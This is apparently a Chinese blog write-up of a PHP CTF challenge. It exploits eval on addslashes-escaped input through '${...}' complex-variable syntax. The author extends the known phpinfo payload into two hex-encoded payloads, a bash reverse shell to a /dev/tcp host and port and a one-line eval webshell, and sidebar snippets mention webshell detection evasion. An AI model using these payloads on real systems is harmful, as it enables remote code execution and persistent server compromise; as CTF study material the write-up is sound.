dd.fun.php,[php4fun](challenge2)将只能执行phpinfo的漏洞转换为一句话木马

最新推荐文章于 2021-07-08 09:18:10 发布
最新推荐文章于 2021-07-08 09:18:10 发布
阅读量222 收藏
点赞数
文章标签: dd.fun.php

源码 :

$str=@(string)$_GET['str'];

eval('$str="'.addslashes($str).'";');

最开始百思不得其解 , 然后查阅了一些大佬们的 WriteUp

得到如下的 payload :

?str=${phpinfo()}

相关 php 官方文档可以参考 :

但是仍旧不太明白为什么这样就可以执行代码...

希望有知道的大佬可以教教我

本文的重点来了

笔者在根据网上大佬们提供的 Payload 的复现的时候发现

(原版的题目服务器已经挂掉了 , 所以笔者也不知道这个题最终的目标是啥...)

这个题目好像就是只让你执行一下 phpinfo 就行了

那么可不可以再猥琐一点执行一点别的呢

尝试一下直接这样行不行 :

?str={eval($_GET[c])}&c=phpinfo();

// 似乎并不行...

经过一番尝试 , 笔者最终发现了下面两种 Payload

// 一个反弹 shell 的 Payload

?str=${system(hex2bin(ff0a2f62696e2f62617368202d6320277368202d69203e26202f6465762f7463702f3132372e302e302e312f3434343420303e263127))}

// 一个一句话木马的 Payload

?str=${eval(substr(hex2bin(ff6576616c28245f524551554553545b635d293b),1,19))}&c=phpinfo();

dd72566ca4df

image.png

甜嗑儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dd.fun.php,帝国CMS强制下载txt文件浏览器带下载进度显示
weixin_36157837的博客
03-18 298
一般来说,下载txt会直接打开,把下面的代码放入到下载页面中,就提示下载并可以进度保存了!文件位置(\e\DownSys\class\DownSysFun.php)找到如下代码(帝国CMS7.5 大概203行左右)//下载Header("Content-type: application/octet-stream");//Header("Accept-Ranges: bytes");//Heade...
云演CTF——php4fun
weixin_56301399的博客
01-16 3657
云演CTF: 010.php4fun
wanguixiu的博客
06-10 919
云演CTF: 010.php4fun 作者: admin 时间: 2021-05-31 分类: 云演CTF 题目给出源码备份"index.bak":<?php function filter($v){ echo $v; $w = array('<','>','\.\.','^/+.*','file:///','php...
php4fun
wusuopuBUPT的专栏
01-23 2295
php4fun : http://php4fun.sinaapp.com/ 攻略:http://drops.wooyun.org/papers/660
windows php7.4 php-apcu.dll
09-11
标题中的"windows php7.4 php-apcu.dll"和描述中的"windows php7 apcu php_apcu.dll"都提到了Windows环境下PHP 7.4版本与APCu扩展的关联,特别是`php_apcu.dll`这个动态链接库文件。APCu(Alternative PHP Cache for...
php-5.3.28.tar.gz
01-10
PHPPHP:Hypertext Preprocessor)是一种广泛使用的开源脚本语言,主要应用于Web开发,可以嵌入到HTML中执行。在本例中,我们关注的是PHP的5.3.28版本,它是一个tar.gz格式的压缩包,通常用于Linux环境。这种压缩...
多语言微交易多行情盘PHP平台源码扩展redis phpinfo.zip
最新发布
01-10
环境ngingx mysql5.6 php7.0扩展redis phpinfo 已修复多出 远程攻击漏洞 上传搭建 导入数据库 然后 application/config.php 配置数据库 coller.html 挂波动行 后台lord默认账号admin密码123456
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息
09-30
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息,查看zend的目录是否有user权限。默认即可。
php使用Image Magick将PDF文件转换为JPG文件的方法
10-24
// 执行ImageMagick的'convert'命令,将PDF转换为JPG,并应用设置 exec('convert "'.$pdf_file.'" -colorspace RGB -resize 800 "'.$save_to.'"', $output, $return_var); if ($return_var == 0) { // 如果执行...
php 写入文件 ctf,[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)
weixin_42305622的博客
03-10 1001
原作者:admin[原理]文件包含读源码、x-forwarded-forpreg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。[目的]掌握正则表达式、伪协议读取源码[环境]windows[工具]firefox、burp[步骤]1.进入云平台设备维护中心页面,利用PHP伪协议读取源码。2.将得到的源码进行base6...
HITCTF 2018 wp [我真是菜鸟]
Assassin
02-02 5761
WEB PHPreading 源码泄露,存在index.php.bak,,解一下base64知道 $flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm'); 输入得到flag BabyEval 看一下泄露了一部分源码 <!-- $str=@(str
使用复杂变量绕过addslashes函数实现RCE
silence1_的博客
11-01 1692
使用复杂变量绕过addslashes函数实现RCE addslashes ( string $str ) : string 使用反斜线引用字符串 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(’)、双引号(")、反斜线(\)与 NUL(NULL 字符)。 简单的说,就是在传入的字符串的单引号,双引号,反斜线和空字符前加反斜线转义 先看看题目代码: &...
ctf show-web入门 php特性篇部分题解
volcano的博客
02-24 3287
ctfshowphp特性preg_match()intval()web96(路径问题)web98web99(in_array弱类型比较)in_array()web100var_dump()函数web101web102-103hex2bin()函数substr() 函数call_user_func()函数web104、106web105(双$$变量覆盖)web107(parse_str变量覆盖)parse_str()Parse_str()函数引起的变量覆盖漏洞web108(%00截断)ereg()函数strr
HITCTF2018-web全题解
蚁景网安学院
02-07 2803
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
PHP ctf addslashes,[红日安全]代码审计Day13 - 特定场合下addslashes函数的绕过
weixin_33631836的博客
03-17 685
本文由红日安全成员: l1nk3r 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并...
PHP美元符和花括号组合那些事—${${}}
weixin_30624825的博客
11-15 417
双美元符+{}:${${variable}}是一种比较常见的用法,但是它的实现原理是什么呢?今天来探究一下: 提及这种用法,还得先说一下PHP的String类型php.net上指出,一个字符串可以用4种方式表达:单引号,双引号,heredoc语法结构,nowdoc语法结构这里heredoc语法结构和双引号形式类似,同样nowdoc结构对应单引号单引号:单引号包围起来的字符串中,单引号必须转义才能...
PHP代码审计----3、代码注入
七天
07-08 631
文章目录代码注入1、eval()函数2、preg_replace+/e()函数3、assert()4、call_user_func()5、call_user_func_array()6、create_function() 代码注入 PHP 可能出现代码注入的函数:eval()、preg_replace+/e()、assert()、call_user_func()、call_user_func_array()、create_function()等 查找程序中程序中使用这些函数的地方,检查提交变量是否用户可控
php一句话木马免杀
08-03
引用[1]中提到了一个关于PHP一句话木马的实验,该木马成功骗过了阿里云的检测。木马的代码被放置在服务器的php文件夹下的miansha.php文件中。该木马使用了一些技巧来绕过检测,比如设置了执行时间限制和忽略用户中止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值